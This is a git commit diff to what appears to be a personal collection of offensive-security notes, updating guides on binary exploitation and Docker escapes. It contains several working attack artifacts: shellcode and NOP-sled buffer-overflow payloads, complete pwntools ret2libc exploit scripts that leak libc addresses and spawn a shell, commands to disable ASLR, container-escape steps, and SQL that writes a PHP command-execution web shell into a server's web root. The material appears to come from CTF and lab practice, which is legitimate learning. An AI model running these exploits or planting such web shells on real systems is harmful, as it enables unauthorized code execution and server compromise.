bump

2023-05-03 23:20:31 +02:00 · 2023-05-03 23:20:31 +02:00 · b15d5ea2ba
parent 4fde0d92da
commit b15d5ea2ba
5 changed files with 136 additions and 28 deletions
--- a/Exploits/Binaries/Return
+++ b/Exploits/Binaries/Return
@ -11,7 +11,9 @@ python -c "print('\x90' * 30 +'\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\
 ```

 ## Finding Offset
+
 ### via gdb segfault output 
+
 * 64 bit addresses use 6 out of 8 byte for addresses.
 ```sh
 gdb ./application
@ -41,6 +43,7 @@ pt/metasploit/tools/exploit/pattern_offset -l 180 -q <rbpContent>
 ```

 ## Crafting Payload
+
 * Contains Junk/NOPslice + shellcode + Junk over rbp + return address
 * Inside gdb
 ```sh
@ -62,7 +65,9 @@ run $(python -c "print('A' * 100 + <shellcode> + 'A' * 12 + 'B' * 6)")
 [...]
 ```
 * Shellcode starts at `0x7fffffffe2b8 - 4 bytes = 0x7fffffffe2b4`.
+
 ## NopSled
+
 * Prepend **nopsled** instead of `A` and pick an address inside as the future return address, for example `0x7fffffffe2a8`.
 ```sh
 (gdb) x/100x $rsp-200
--- a/Exploits/Binaries/Ropping.md
+++ b/Exploits/Binaries/Ropping.md
@ -7,6 +7,7 @@

 ## Example

+### Example 1
 ```python
 from pwn import *

--- a/Exploits/Binaries/Tips
+++ b/Exploits/Binaries/Tips
@ -0,0 +1,41 @@
+# Tips & Tricks for Binary Exploitations
+
+# Toggle ASLR
+
+State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch.
+
+* Take a look of the current stay via
+```sh
+sysctl kernel.randomize_va_space
+```
+
+Disable ASLR temporarily via 
+```sh
+echo 0 | sudo tee /proc/sys/kernel.randomize_va_space
+```
+
+Disable it permanently via
+```sh
+echo "kernel.randomize_va_space = 0" > /etc/sysctl.d/01-disable-aslr.conf
+```
+
+## Keep stdin open
+
+Sometimes input of payloads via stdin pipes cannot be done directly.
+If you call an interactive shell in the exploited binary it may not stay open if you pipe the payload as is.
+
+Therefore, the payload should be piped in the following way
+```sh
+(echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBu\x06' ; cat ) | ./binary
+```
+
+Therein, it is important to use the parameters `-e` and -- depending on the binary `-n` -- for the input being interpeted raw and not as ascii values.
+
+Debug the input via `xxd`
+```sh
+echo -e '\xde\xad\xc0\xde' | xxd
+```
+
+## NULL bytes in Adresses
+
+NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes
--- a/Exploits/Binaries/ret2libc.md
+++ b/Exploits/Binaries/ret2libc.md
@ -23,15 +23,28 @@
 ```sh
 info sharedlibrary
 ```
+or statically via ldd 
+```sh
+ldd ./<binary>
+```
+
+### Find offsets to gadgets in libc

-### Manually
 * On target find `sh` address inside libc
 ```sh
 strings -a -t x /lib32/libc.so.6 | grep /bin/sh
 ```
 * Sub from `system` address from inside libc
 ```sh
-readelf -s /lib32/libc.so.6 | grep system
+readelf -s /lib32/libc.so.6 | grep system |  awk '{print $2}'
+```
+
+* Pwntools can be used as well
+```sh
+libc = elf.libc
+libc.address = 0x7ff83d8d000
+system = libc.sym['system']
+bin_sh = next(libc.search(b'/bin/sh'))
 ```

 ### Measure the Buffer
@ -62,7 +75,10 @@ objdump -d <file> | grep ret

 * [xct's ropstar](https://github.com/xct/ropstar.git)

-## Example without ASLR
+## Examples 
+
+### Example without ASLR
+
 ```python
 from pwn import *

@ -76,18 +92,18 @@ rop_ret = <found rop ret>

 payload =  b'A' * <count>
 payload += b'B' * 8
-payload += p64(rop_ret)
 payload += p64(rop_rdi)
 payload += p64(sh)
+payload += p64(0x0) # maybe rop_ret
 payload += p64(system)
-payload += p64(0x0) # end payload

 p.recv()
 p.sendline(payload)
 p.interactive()
 ```

-## Example with ASLR
+### Example with ASLR
+
 * Create context
 ```python
 #!/usr/bin/env python3
@ -100,7 +116,7 @@ rop = ROP(elf)
 libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
 p = process()

-# ROP I, needed when ASL is enabled
+# ROP I, needed when ASLR is enabled
 payload =  b'A' * 18
 payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
 payload += p64(elf.got.gets)
@ -128,3 +144,46 @@ p.sendline(payload)
 p.recvline()
 p.interactive()
 ```
+
+### Example: exploit_me
+
+This is taken from [shoulderhu's gitbook](https://github.com/shoulderhu/gitbook-tryhackme/blob/master/walkthroughs/medium/ret2libc.md)
+The libc base is found through a delta of the leaked value and libc gets symbol offset.
+
+
+```python
+from pwn import *
+
+context.binary = binary = './exploit_me'
+elf = ELF(binary)
+rop = ROP(elf)
+libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
+
+padding = b'A' * 18
+payload = padding
+payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
+payload += p64(elf.got.gets)
+payload += p64(elf.plt.puts)
+payload += p64(elf.symbols.main)
+
+p = process()
+p.recvline()
+p.sendline(payload)
+p.recvline()
+leak = u64(p.recvline().strip().ljust(8, b'\0'))
+p.recvline()
+
+log.info(f'Gets leak => {hex(leak)}')
+libc.address = leak - libc.symbols.gets
+log.info(f'Libc base => {hex(libc.address)}')
+
+payload = padding
+payload += p64(rop.find_gadget(['pop rdi', 'ret'])[0])
+payload += p64(next(libc.search(b'/bin/sh')))
+payload += p64(rop.find_gadget(['ret'])[0])
+payload += p64(libc.symbols.system)
+
+p.sendline(payload)
+p.recvline()
+p.interactive()
+```
--- a/Exploits/Containers/Docker.md
+++ b/Exploits/Containers/Docker.md
@ -1,5 +1,22 @@
 # Docker Vulnerabilities

+## Check if you are inside a container
+
+* Low process count
+```sh
+ps aux
+```
+
+* `.dockerenv` in `/`
+```sh
+cd / && ls -lah
+```
+
+* cgroups contain docker names
+```sh
+pwd /proc/1
+cat cgroups
+```
 * [Container enumeration](https://github.com/stealthcopter/deepce)

 ## Abusing Registry
@ -49,7 +66,7 @@ dive <IMAGE-ID>
 ## Escape Container via Exposed Docker Daemon
 * Looking for exposed docker sockets
 ```sh
-find / -name "*sock"
+find / -name "*sock" 2>/dev/null
 groups
 ```

@ -97,6 +114,7 @@ chmod a+x /exploit
 sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
 ```
 * The file may appear outside the container on the host system
+
 ## Check fdisk

 * `fdisk -l` and `lsblk`, host bulk device may be exposed
@ -144,12 +162,13 @@ Upgrade: tcp
 * Login into DB
 * Create table
 * Inject PHP code
-* Select table content intoa file the user can read
+* Select table content into a file the user can read
 * Execute the file
 ```sql
 create table h4x0r (pwn varchar(1024));
-insert into h4x0r (pwn) values ('<?php $cmd=$_GET[“cmd”];system($cmd);?>');
-select '<?php $cmd=$_GET["cmd"];system($cmd);?>' INTO OUTFILE '/var/www/html/shell.php';
+insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
+select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
+copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
 ```
 * curl the webshell hon the exploited host
 ```sh
@ -166,20 +185,3 @@ https://github.com/dirtycow/dirtycow.github.io
 * Least Privileges
 * Seccomp
 * Securing Registry via TLS
-
-## Checking if you are inside a container
-* Low process count
-```sh
-ps aux
-```
-
-* `.dockerenv` in `/`
-```sh
-cd / && ls -lah
-```
-
-* cgroups contain docker names
-```sh
-pwd /proc/1
-cat cgroups
-```